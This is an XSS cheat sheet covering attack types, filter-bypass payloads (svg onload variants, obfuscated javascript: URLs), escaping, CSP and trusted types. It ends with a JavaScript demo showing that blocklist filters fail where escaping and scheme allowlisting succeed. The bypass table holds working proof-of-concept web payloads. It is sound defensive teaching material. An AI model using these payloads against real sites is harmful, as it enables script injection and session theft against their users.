XSS

Cross-site scripting (XSS) cheat sheet
xsser

  • Type
    • Self-XSS
    • Reflected XSS
    • Stored XSS
  • Mitigation

    • Filter

      Pattern          Bypass
      [SPACE]on...=    <svg<TAB>onload=alert(1)>
      [SPACE]on...=    <svg\nonload=alert(2)>
      [SPACE]on...=    <svg/ onload=alert(3)>
      javascript:      <a href="\x01javascript:alert(4)">X</a>
      javascript:      <a href="java\tscript:alert(5)">X</a>
      javascript:      <a href="java&Tab;script:alert(6)">X</a>
      <script          JSFuck
    • Escape (HTML Entity)

      Symbol    Alternative
      <         &lt;
      >         &gt;
      "         &quot;
    • Content Security Policy (CSP) > CSP Evaluator

      • script-src
      • Nonce
    • trusted-types (Chrome)

    • HTTP response header
    • Define trusted resources
    • HttpOnly
  • Bypass

    • <base>
      • Changes the base URL of all relative URLs
    • Relative Path Overwrite (RPO)
  • Case Study
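
For the Filter and Escape tables under Mitigation, an added example (not code from the original page): two hypothetical blocklist filters written from the Pattern column let the table's own bypass rows through, while output escaping and a scheme allowlist applied after URL parsing neutralize the same inputs. The names blockHandler, blockJsUrl, escapeHtml and safeHref and the example.com URL are assumptions.

```javascript
// Added example, not from the original page. Both filters are hypothetical
// stand-ins for the blocklist patterns in the Filter table.
const blockHandler = (s) => !/ on\w+=/i.test(s);     // pattern "[SPACE]on...="
const blockJsUrl = (s) => !/^javascript:/i.test(s);  // pattern "javascript:"

// Constructed inputs: rows of the Filter table, with \t, \n and \x01 as real bytes.
const markupRows = ["<svg\tonload=alert(1)>", "<svg\nonload=alert(2)>"];
const hrefRows = ["\x01javascript:alert(4)", "java\tscript:alert(5)"];

// Escape for HTML text and quoted-attribute contexts (superset of the Escape table).
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Allowlist the scheme after parsing with the WHATWG URL parser, which strips
// leading control characters and embedded tab/newline the way browsers do.
function safeHref(s) {
  let u;
  try { u = new URL(s); } catch { return null; }  // relative or unparsable: reject
  return ["http:", "https:"].includes(u.protocol) ? escapeHtml(u.href) : null;
}

// Collect the results so they can be inspected or asserted on.
function report() {
  return {
    handlerFilterPassed: markupRows.filter(blockHandler).length, // rows the blocklist missed
    jsUrlFilterPassed: hrefRows.filter(blockJsUrl).length,       // rows the blocklist missed
    escaped: markupRows.map(escapeHtml),  // inert text once escaped on output
    hrefs: hrefRows.map(safeHref),        // rejected by the scheme allowlist
    goodHref: safeHref("https://example.com/?a=1&b=2"),
  };
}

console.log(report());
```

Escaping must match the output context; the entity map here covers HTML text and quoted attribute values only, not script or CSS contexts.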